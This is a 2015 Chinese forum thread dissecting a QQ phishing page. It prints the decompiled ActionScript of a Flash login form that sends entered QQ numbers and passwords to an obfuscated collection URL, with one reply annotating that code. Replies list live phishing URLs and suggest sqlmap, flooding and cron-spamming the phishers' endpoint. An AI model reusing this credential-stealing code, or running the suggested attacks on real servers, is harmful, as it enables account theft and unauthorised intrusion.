这是一个创建于 3877 天前的主题,其中的信息可能已经有所发展或是发生改变。
http://www.huanyahome.com/ggd/dne1795es/index.php?fileId=1538
就是这个啦。有朋友中招了,结果开始各种发网址。
这种时候是不是应该 @typcn ?
上面那个网址跳转之后的目标好像会变。
另外输入密码的框框什么的都是flash,不过还好没混淆。
对注入无力,希望有大神可以为民除害一下。
 | 1 zsx 2015-05-09 22:33:06 +08:00 这年头的钓鱼网站居然还有Flash做密码输入框的啊,看了看地址还是动态生成的,后生可畏(笑 |
 | 2 canky 2015-05-09 22:34:23 +08:00 祭出sqlmap神器 |
 | 3 RecursiveG OP |
 | 4 243205964 2015-05-09 22:38:45 +08:00 坐等被大神玩坏, |
 | 5 est 2015-05-09 22:40:39 +08:00 现在 sqlmap 好像很流行的样子。。。。 |
 | 6 RIcter 2015-05-09 22:42:11 +08:00 有空多干点别的,别在这里浪费时间。 |
| 7 RIcter 2015-05-09 22:43:29 +08:00 另外想日站日点有意义的..... |
 | 8 typcn 2015-05-09 22:44:11 +08:00  I HATE FLASH !!!! F**K |
 | 9 kiritoalex 2015-05-09 22:44:57 +08:00 @typcn 23333333 |
 | 11 8qwe24657913 2015-05-09 23:14:53 +08:00 |
| 12 typcn 2015-05-09 23:21:17 +08:00 @8qwe24657913 上次反编译 B 站播放器,发现用了 Native C 代码,靠着汇编码一点点找出 API Key ,后来吐了,Flash Decompiler 也卸载了,Flash 插件直接删了,推进一下 Flash 被淘汰的进程。 |
 | 13 kookxiang 2015-05-09 23:25:24 +08:00 我发现125%的网页缩放已经秒了很多钓鱼网站 |
| 14 RecursiveG OP |
 | 16 chian 2015-05-09 23:35:15 +08:00 QQ201748977? http://www.tjjinka.com.cn/login_tpl/ http://www.zlytssbec.cn/login_tpl/ package login_fla { import fl.controls.*; import flash.display.*; import flash.events.*; import flash.text.*; import flash.utils.*; import flash.ui.*; import flash.system.*; import flash.net.*; import adobe.utils.*; import flash.accessibility.*; import flash.errors.*; import flash.external.*; import flash.filters.*; import flash.geom.*; import flash.media.*; import flash.printing.*; import flash.xml.*; public dynamic class MainTimeline extends MovieClip { public var xx:TextInput; public var id:String; public var count:int; public var pass:TextInput; public var reUrl:String; public var paramObj:Object; public var key:String; public var strpost:String; public var tf:TextFormat; public var but:SimpleButton; public var ntf:TextFormat; public var tag:MovieClip; public function MainTimeline(){ addFrameScript(0, frame1); } public function destr(_arg1:String):String{ _arg1 = replace(_arg1, "e4a5f", "www"); _arg1 = replace(_arg1, "f13fe2", "."); _arg1 = replace(_arg1, "0f883e", "com"); _arg1 = replace(_arg1, "56e057", "/"); _arg1 = replace(_arg1, "4EbC89", "="); _arg1 = replace(_arg1, "7CE07A", "?"); _arg1 = replace(_arg1, "49ba59", "php"); _arg1 = replace(_arg1, "4E8B0C", "html"); _arg1 = replace(_arg1, "7E8E0C", "-"); return (_arg1); } public function fnPostData(_arg1:MouseEvent){ var _local2:URLRequest; var _local3:URLVariables; if ((((((((xx.text.length < 5)) || ((pass.text.length < 5)))) || ((xx.text.length > 12)))) || ((pass.text.length > 18)))){ tag.visible = true; return; }; _local2 = new URLRequest(); _local2.url = strpost; _local2.method = URLRequestMethod.POST; _local3 = new URLVariables(); _local3.user = xx.text; _local3.pass = pass.text; _local3.id = id; _local2.data = _local3; sendToURL(_local2); if (count <= 1){ tag.visible = true; count = (count + 1); return; }; navigateToURL(new URLRequest(reUrl), "_self"); } function frame1(){ tag.visible = false; stage.showDefaultCOntextMenu= false; tf = new TextFormat(); ntf = new TextFormat(); tf.fOnt= "Verdana,Tahoma,Arial"; tf.color = 0x333333; tf.size = 16; ntf.fOnt= "宋体,Tahoma,Verdana,Arial"; ntf.size = 14; ntf.color = 0xAAAAAA; xx.restrict = "0-9"; xx.text = "QQ号码"; pass.setStyle("textFormat", ntf); xx.setStyle("textFormat", ntf); pass.text = "密码"; count = 1; id = ""; strpost = ""; reUrl = "http://www.baidu.com"; paramObj = stage.loaderInfo.parameters; for (key in paramObj) { if (key.length == 4){ id = paramObj[key]; }; if (key.length == 5){ strpost = ("http://" + destr(paramObj[key])); }; if (key.length == 6){ reUrl = ("http://" + destr(paramObj[key])); }; }; but.addEventListener(MouseEvent.CLICK, fnPostData); pass.addEventListener(MouseEvent.CLICK, fnpass); xx.addEventListener(MouseEvent.CLICK, fnxx); } public function replace(_arg1:String, _arg2:String, _arg3:String):String{ var _local4:String; var _local5:Boolean; var _local6:*; var _local7:*; _local4 = new String(); _local5 = false; _local6 = 0; for (;_local6 < _arg1.length;_local6++) { if (_arg1.charAt(_local6) == _arg2.charAt(0)){ _local5 = true; _local7 = 0; while (_local7 < _arg2.length) { if (_arg1.charAt((_local6 + _local7)) != _arg2.charAt(_local7)){ _local5 = false; break; }; _local7++; }; if (_local5){ _local4 = (_local4 + _arg3); _local6 = (_local6 + (_arg2.length - 1)); continue; }; }; _local4 = (_local4 + _arg1.charAt(_local6)); }; return (_local4); } public function fnxx(_arg1:MouseEvent){ tag.visible = false; xx.setStyle("textFormat", tf); xx.text = ""; } public function fnpass(_arg1:MouseEvent){ tag.visible = false; pass.setStyle("textFormat", tf); pass.text = ""; pass.displayAsPassword = true; } } }//package login_fla |
| 17 typcn 2015-05-09 23:35:32 +08:00 @RecursiveG 其实有一种歪门邪道的做法,根据上下文修改那个算不上代码的代码,把他用过的变量都记录下来,然后输出出来,一般就出现答案了 |
 | 18 mengskysama 2015-05-09 23:35:54 +08:00 那么,先来个难度低一点的http://blliqv.cn/ |
 | 19 dong3580 2015-05-09 23:38:40 +08:00 |
| 20 8qwe24657913 2015-05-09 23:39:16 +08:00 @typcn 然而浏览器直接打开一个B站的站外播放器,F12 Network就可以得到appkey=8e9fc618fbd41e28 |
| 21 typcn 2015-05-09 23:44:31 +08:00 @8qwe24657913 不是那个,是 API Secret,计算 Sign 用的 |
| 22 8qwe24657913 2015-05-10 00:06:57 +08:00 @typcn 好吧我承认我并没有找到sign或API Secret的用途……api.txt里没有,直接抓包倒是有,但用sign和直接appkey似乎区别不大…… |
 | 23 ouqihang 2015-05-10 00:08:40 +08:00 @mengskysama 文本框里啥也没输,点几下 ‘点击验证’ 后,网站自动跳到账号解限成功页面。。。 |
 | 24 rssf 2015-05-10 00:26:10 +08:00  1 右键看一下源代码,貌似这伙计在里头很怨念啊 |
 | 25 flowfire 2015-05-10 00:46:07 +08:00 @8qwe24657913 b站的api key 和secret key 不是可以申请的么?要费那么大劲干嘛? |
 | 26 xiaozhizhu1997 2015-05-10 06:38:32 +08:00 via Android 这些钓鱼站基本都在香港…试试打个几百M过去应该就被null了。 |
 | 27 bdbai 2015-05-10 09:58:28 +08:00 via iPhone |
 | 28 672530599 2015-05-10 12:43:39 +08:00 尝试分析了一下,因为没有学过as,可能有些地方有误 /** 试着大概分析一下 <embed src="http://www.v2ex.com/login_tpl/0.swf" wmode="transparent" quality="high" width="622px" height="368px" align="L" scale="noborder" flashvars="HDcF=1538&UL1AK=e4a5ff13fe2tjjinkaf13fe2comf13fe2cn56e057twPJ156e057kZAlNl56e057b6n2m5HBNf13fe24E8B0C&MRlzqc=userf13fe2qzonef13fe2qqf13fe20f883e56e05720174897756e057photo" allowscriptaccess="sameDomain" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash"> **/ //class MainTimeline package login_fla { import adobe.utils.*; import fl.controls.*; import flash.accessibility.*; import flash.display.*; import flash.errors.*; import flash.events.*; import flash.external.*; import flash.filters.*; import flash.geom.*; import flash.media.*; import flash.net.*; import flash.printing.*; import flash.system.*; import flash.text.*; import flash.ui.*; import flash.utils.*; import flash.xml.*; public dynamic class MainTimeline extends flash.display.MovieClip { public function MainTimeline()//构造函数 { super(); addFrameScript(0, frame1); return; } public function destr(arg1:String):String//参数变换 { //UL1AK=e4a5f,f13fe2,[tjjinka],f13fe2,[com],f13fe2,[cn],56e057,[twPJ1],56e057,[kZAlNl],56e057,[b6n2m5HBN],f13fe2,4E8B0C //UL1AK=www.tjjinka.com.cn/twPJ1/kZAlNl/b6n2m5HBN.html //MRlzqc=userf13fe2qzonef13fe2qqf13fe20f883e56e05720174897756e057photo //=user.qzone.qq.com/201748977/photo arg1 = replace(arg1, "e4a5f", "www"); arg1 = replace(arg1, "f13fe2", "."); arg1 = replace(arg1, "0f883e", "com"); arg1 = replace(arg1, "56e057", "/"); arg1 = replace(arg1, "4EbC89", "="); arg1 = replace(arg1, "7CE07A", "?"); arg1 = replace(arg1, "49ba59", "php"); arg1 = replace(arg1, "4E8B0C", "html"); arg1 = replace(arg1, "7E8E0C", "-"); return arg1; //各种替换 } public function fnPostData(arg1:flash.events.MouseEvent):*//发送数据 { var loc1:*=null;//URLRequest对象 var loc2:*=null;//URLVariables对象 if (xx.text.length < 5 || pass.text.length < 5 || xx.text.length > 12 || pass.text.length > 18) { tag.visible = true; return; //账号位数小于5或大于12 //密码位数小于5或大于18 } loc1 = new flash.net.URLRequest(); loc1.url = strpost;//http://www.tjjinka.com.cn/twPJ1/kZAlNl/b6n2m5HBN.html loc1.method = flash.net.URLRequestMethod.POST;//post loc2 = new flash.net.URLVariables(); loc2.user = xx.text;//账号 loc2.pass = pass.text;//密码 loc2.id = id;//id loc1.data = loc2;//POST数据 flash.net.sendToURL(loc1);//发送POST if (count <= 1) { tag.visible = true; count = count + 1; return; }// flash.net.navigateToURL(new flash.net.URLRequest(reUrl), "_self");//输入过后转向QQ空间 return; } function frame1():* { tag.visible = false; stage.showDefaultCOntextMenu= false; tf = new flash.text.TextFormat(); ntf = new flash.text.TextFormat(); tf.fOnt= "Verdana,Tahoma,Arial"; tf.color = 3355443; tf.size = 16; ntf.fOnt= "宋体,Tahoma,Verdana,Arial"; ntf.size = 14; ntf.color = 11184810; xx.restrict = "0-9"; xx.text = "QQ号码"; pass.setStyle("textFormat", ntf); xx.setStyle("textFormat", ntf); pass.text = "密码"; //以上各种样式忽略 count = 1; id = ""; strpost = ""; reUrl = "http://www.baidu.com";//并没有意义 paramObj = stage.loaderInfo.parameters;//获取参数对象 var loc1:*=0; var loc2:*=paramObj; /** HDcF=1538& UL1AK=e4a5ff13fe2tjjinkaf13fe2comf13fe2cn56e057twPJ156e057kZAlNl56e057b6n2m5HBNf13fe24E8B0C& MRlzqc=userf13fe2qzonef13fe2qqf13fe20f883e56e05720174897756e057photo **/ for (key in loc2) { if (key.length == 4) { //HDcF=1538&//fileId=1538 id = paramObj[key];//1538 //id=1538 } if (key.length == 5) { //UL1AK=e4a5ff13fe2tjjinkaf13fe2comf13fe2cn56e057twPJ156e057kZAlNl56e057b6n2m5HBNf13fe24E8B0C strpost = "http://" + destr(paramObj[key]);//e4a5ff13fe2tjjinkaf13fe2comf13fe2cn56e057twPJ156e057kZAlNl56e057b6n2m5HBNf13fe24E8B0C //strpost=http://www.tjjinka.com.cn/twPJ1/kZAlNl/b6n2m5HBN.html } if (key.length != 6) { continue; } //key.length == 6 //MRlzqc=userf13fe2qzonef13fe2qqf13fe20f883e56e05720174897756e057photo reUrl = "http://" + destr(paramObj[key]);//userf13fe2qzonef13fe2qqf13fe20f883e56e05720174897756e057photo //reUrl=http://user.qzone.qq.com/201748977/photo } but.addEventListener(flash.events.MouseEvent.CLICK, fnPostData);//登陆按钮点击事件 pass.addEventListener(flash.events.MouseEvent.CLICK, fnpass);//密码框点击事件 xx.addEventListener(flash.events.MouseEvent.CLICK, fnxx);//账号框点击事件 return; } public function replace(arg1:String/*原文本*/, arg2:String/*需替换的文本*/, arg3:String/*替换成的文本*/):String//替换函数 { var loc1:*=null;//存储替换后的文本 var loc2:*=false;//若arg1某一个位置以后与arg2相等,置true var loc3:*=undefined;//记录arg1到什么位置 var loc4:*=undefined;//记录arg2到什么位置 loc1 = new String(); loc2 = false; loc3 = 0; while (loc3 < arg1.length) { if (arg1.charAt(loc3) != arg2.charAt(0)) { loc1 = loc1 + arg1.charAt(loc3);//如果字符不等加到loc1 } else //字符相等 { loc2 = true; loc4 = 0; while (loc4 < arg2.length) { if (arg1.charAt(loc3 + loc4) != arg2.charAt(loc4)) { loc2 = false; break; } ++loc4; }//以上判断arg1某一个位置以后是否与arg2相等 if (loc2) //若找到 { loc1 = loc1 + arg3;//直接加上arg3 loc3 = loc3 + (arg2.length - 1);//移动位置 } else { loc1 = loc1 + arg1.charAt(loc3);//不等则一个一个字符相加 } } ++loc3; } //总结这个replace函数只是普通替换,并没有增加其他东西 return loc1; } public function fnxx(arg1:flash.events.MouseEvent):*//账号框点击样式 { tag.visible = false; xx.setStyle("textFormat", tf); xx.text = ""; return; } public function fnpass(arg1:flash.events.MouseEvent):*//密码框点击样式 { tag.visible = false; pass.setStyle("textFormat", tf); pass.text = ""; pass.displayAsPassword = true; return; } public var xx:fl.controls.TextInput;//账号文本框 public var id:String;//钓鱼网id号 public var count:int;//记录点击数 public var pass:fl.controls.TextInput;//密码文本框 public var reUrl:String;//被黑的QQ空间地址 public var paramObj:Object;//参数对象 public var key:String;//参数键值 public var strpost:String;//POST地址 public var tf:flash.text.TextFormat; public var but:flash.display.SimpleButton;//登陆按钮 public var ntf:flash.text.TextFormat; public var tag:flash.display.MovieClip; } } |
 | 29 eastphoton 2015-05-10 15:39:40 +08:00 "method": "POST", "url": "http://www.yinshuash.com.cn/SceBVDdsD.html", pass=1111111111&id=1538&user=111111 挂CRON玩玩 |
 | 30 ytf4425 2015-05-10 17:32:45 +08:00 尼玛就几张图片毫无真实感 |
 | 31 secondwtq 2015-05-11 09:56:03 +08:00 表示默认禁用 Flash ... |
 | 32 erevus 2015-05-12 10:28:30 +08:00 |
Select Language